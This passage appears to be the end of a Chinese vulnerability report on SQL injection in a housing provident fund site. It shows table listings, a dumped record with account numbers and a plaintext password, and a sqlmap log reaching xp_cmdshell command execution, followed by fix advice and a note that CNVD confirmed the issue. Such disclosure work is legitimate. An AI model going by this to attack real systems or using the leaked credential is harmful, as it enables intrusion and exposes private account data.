165814 || dbo.v_168_dwzz_old | 165814 || dbo.v_168_dz2 | 147125 || dbo.v_web_wtmx10 | 120510 || dbo.v_web_wtmx11 | 89190 || dbo.v_dw_gzmx | 76545 || dbo.v_dwzz_old | 76088 || dbo.v_09_10_xh | 59814 || dbo.v_web_wtmx09 | 34592 || dbo.v_web_hdqk1 | 29389 || dbo.v_web_hdqk1 | 29389 || dbo.sys_log | 24920 || dbo.hdzx | 11659 || dbo.v_168_dwinfo | 10587 || dbo.v_house_info | 9579 || dbo.v_save_etps_password | 7666 || dbo.v_web_sdqk | 4741 || dbo.tongji | 4323 || dbo.web_dwinfo | 3387 || dbo.v_168_dwdz | 1043 || dbo.cms_hdjl | 464 || dbo.SYS_SITERIGHT | 360 || dbo.WELFARE_NEWS | 257 || dbo.sys_role_resource | 192 || dbo.sys_role_resource | 192 || dbo.fagui | 102 || dbo.wenjian | 74 || dbo.supply_note | 69 || dbo.sys_resource | 60 || dbo.sys_user_role | 47 || dbo.sys_user_role | 47 || dbo.xzsp_dw | 39 || dbo.xzsp_dw | 39 || dbo.SYS_MENU | 38 || dbo.mail_material | 34 || dbo.supply_replynote | 34 || dbo.sysconstraints | 34 || dbo.focus_user | 30 || dbo.pbcatcol | 29 || dbo.kill_kk | 21 || dbo.pbcatedt | 21 || dbo.DIY_TEMPTALBLE | 20 || dbo.pbcatfmt | 20 || dbo.CULTURE_INVESTDETAIL | 13 || dbo.D99_CMD | 12 || dbo.hero_table | 12 || dbo.sys_user_unit | 8 || dbo.h_quyu | 7 || dbo.advise_upload | 6 || dbo.xzxk | 6 || dbo.v_168_gjd | 5 || dbo.INNER_INFO | 4 || dbo.renyuan_dw | 4 || dbo.renyuan_dw | 4 || dbo.class_supply | 3 || dbo.sqlmapoutput | 3 || dbo.sys_unittype | 3 || dbo.syssegments | 3 || dbo.zxbs | 3 || dbo.CULTURE_INVESTED | 2 || dbo.D99_Tmp | 2 || dbo.fellow_class | 2 || dbo.fellow_link | 2 || dbo.h_loupan | 2 || dbo.pbcattbl | 2 || dbo.tz_js | 2 || dbo.tz_note | 2 || dbo.D99_REG | 1 || dbo.h_loudong | 1 || dbo.LIFA_NEWS | 1 || dbo.sys_siteprevilige | 1 || dbo.sys_siteprevilige | 1 || dbo.v_update_Time | 1 |+--------------------------+---------+Database: hfgjjTable: v_save_password[1 entry]+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+| sjhm | dxjs | ftime | allIn | dwyhzh | zgyhzh | todayIn | enabled | password |+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+| null | 0 | 12 31 2014 12:58PM | 99 | 888880003 | 800978023 | 9 | NULL | s082812 |+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+存在系统交互shell payload content(s)[01:21:19] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[01:21:19] [INFO] retrieving the length of query output[01:21:19] [INFO] retrieved:[01:21:19] [INFO] retrieved:[01:21:21] [INFO] fingerprinting the back-end DBMS operating system version andservice pack[01:21:21] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[01:21:21] [INFO] the back-end DBMS operating system is Windows 2000 Service Pack 0[01:21:22] [INFO] testing if current user is DBA[01:21:22] [INFO] checking if xp_cmdshell extended procedure is available, please wait..do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[01:21:32] [INFO] xp_cmdshell extended procedure is available[01:21:33] [INFO] testing if xp_cmdshell extended procedure is usable[01:21:33] [INFO] retrieving the length of query output[01:21:35] [INFO] retrieving the length of query output[01:21:37] [INFO] xp_cmdshell extended procedure is usabledo you want to retrieve the command standard output? [Y/n/a] y[01:21:39] [INFO] retrieved: 14[01:21:40] [INFO] retrieving the length of query output[01:21:40] [INFO] retrieved: 1[01:21:40] [INFO] retrieved:[01:21:42] [INFO] retrieving the length of query output[01:21:42] [INFO] retrieved: 30[01:22:02] [INFO] retrieved: Windo_s____0 _P Configura_____ 19/30 (63%)[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:02] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[01:22:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:07] [INFO] retrieved: Windo_s __00 _P Configuration 26/30 (87%)[01:22:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:09] [INFO] retrieved: Windows 2000 IP Configuration[01:22:09] [INFO] retrieving the length of query output[01:22:09] [INFO] retrieved: 1[01:22:10] [INFO] retrieved:[01:22:12] [INFO] retrieving the length of query output[01:22:12] [INFO] retrieved: 23[01:22:31] [INFO] retrieved: Ethern____dapter ____: 15/23 (65%)[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:22:37] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[01:22:47] [INFO] retrieved: Ethernet adapter ????:[01:22:47] [INFO] retrieving the length of query output[01:22:47] [INFO] retrieved: 1[01:22:48] [INFO] retrieved:[01:22:50] [INFO] retrieving the length of query output[01:22:50] [INFO] retrieved: 56[01:23:09] [INFO] retrieved: _Medi____ate . . . ___ . _ _______ 18/56 (32%)[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:10] [INFO] retrieved: _Medi____ate . . . _ _ . _ _______ 19/56 (34%)[01:23:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:22] [INFO] retrieved: .._S_ate . . . _ _ . . . . _ . : .. 32/56 (57%)[01:23:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:23] [INFO] retrieved: .._ate . . . _ _ . . . . . . : _a.. 34/56 (61%)[01:23:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:28] [INFO] retrieved: .. . . . . . . . . . : _able_D___.. 41/56 (73%)[01:23:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:41] [INFO] retrieved: ... . . . . . : _able Dis_onnected 54/56 (96%)[01:23:42] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[01:23:43] [INFO] retrieved: ... . . . . . : Cable Dis_onnected 55/56 (98%)[01:23:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:23:46] [INFO] retrieved: Media State . . . . . . . . . . . : Cable Disconnected[01:23:46] [INFO] retrieving the length of query output[01:23:46] [INFO] retrieved:[01:23:47] [INFO] retrieved:[01:23:48] [INFO] retrieving the length of query output[01:23:48] [INFO] retrieved: 25[01:24:06] [INFO] retrieved: Ethe_ne___dapt_r_________ 11/25 (44%)[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:16] [INFO] retrieved: Etherne__adapt_r ?___ ___ 16/25 (64%)[01:24:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:25] [INFO] retrieved: Ethernet adapter ???? 2:[01:24:25] [INFO] retrieving the length of query output[01:24:25] [INFO] retrieved: 1[01:24:26] [INFO] retrieved:[01:24:27] [INFO] retrieving the length of query output[01:24:27] [INFO] retrieved: 36[01:24:47] [INFO] retrieved: _on_ec___n-spec_fic _NS_S________ 18/36 (50%)[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:24:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:03] [INFO] retrieved: ..nnection-spec_fic DNS_Suffix . : 34/36 (94%)[01:25:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:05] [INFO] retrieved: ..nnection-spec_fic DNS Suffix . : 35/36 (97%)[01:25:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:08] [INFO] retrieved: Connection-specific DNS Suffix . :[01:25:08] [INFO] retrieving the length of query output[01:25:08] [INFO] retrieved: 51[01:25:28] [INFO] retrieved: I___d_res_._. . . ._. ._.________ 18/51 (35%)[01:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:30] [INFO] retrieved: I___d_res_._. . . ._. . ._.______ 20/51 (39%)[01:25:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:40] [INFO] retrieved: ..d_res_. . . . ._. . . . __._. :.. 32/51 (63%)[01:25:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:53] [INFO] retrieved: .. . . . . . . ._. : 192.16_.0.249 48/51 (94%)[01:25:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:25:55] [INFO] retrieved: .. . . . . . . . . : **.**.**.** 50/51 (98%)[01:26:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:01] [INFO] retrieved: IP Address. . . . . . . . . . . . : **.**.**.**[01:26:01] [INFO] retrieving the length of query output[01:26:01] [INFO] retrieved: 51[01:26:21] [INFO] retrieved: _Su_ne_ Mask . _ . .__ ___________ 17/51 (33%)[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:28] [INFO] retrieved: Su_ne_ Mask . _ . . _ ._. ___ .__ 24/51 (47%)[01:26:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:41] [INFO] retrieved: .. . . . . . ._. ._. . . :_255_2_.. 39/51 (76%)[01:26:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:42] [INFO] retrieved: ... . . . ._. ._. . . :_255_2_5._.. 40/51 (78%)[01:26:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:45] [INFO] retrieved: .. . . ._. . . . . :_255_2_5.__5.0 45/51 (88%)[01:26:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:48] [INFO] retrieved: .. . . . . . . . . :_255_2_5.255.0 48/51 (94%)[01:26:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:52] [INFO] retrieved: .. . . . . . . . . : 255_255.255.0 50/51 (98%)[01:26:52] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:26:54] [INFO] retrieved: Subnet Mask . . . . . . . . . . . : **.**.**.**[01:26:54] [INFO] retrieving the length of query output[01:26:54] [INFO] retrieved: 51[01:27:18] [INFO] retrieved: Default ____way . . . __._. _____ 22/51 (43%)[01:27:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:21] [INFO] retrieved: Default _a__way . . . __._. _ ___ 24/51 (47%)[01:27:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:32] [INFO] retrieved: .. Gateway . . . __. . . . .__ __.. 35/51 (69%)[01:27:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:38] [INFO] retrieved: .. . . . __. . . . . _ _92.168.0_.. 43/51 (84%)[01:27:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:42] [INFO] retrieved: .. . . . . . . . . _ _92.168.0_254 48/51 (94%)[01:27:43] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:44] [INFO] retrieved: .. . . . . . . . . : _**.**.**.** 50/51 (98%)[01:27:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:27:50] [INFO] retrieved: Default Gateway . . . . . . . . . : 1**.**.**.**[01:27:50] [INFO] retrieving the length of query output[01:27:51] [INFO] retrieved:[01:27:52] [INFO] retrieved:command standard output:---Windows 2000 IP ConfigurationEthernet adapter ????: Media State . . . . . . . . . . . : Cable DisconnectedEthernet adapter ???? 2: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : 1**.**.**.**
如上
过滤修复限制权限
危害等级:高
漏洞Rank:11
确认时间:2015-09-07 08:28
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。
暂无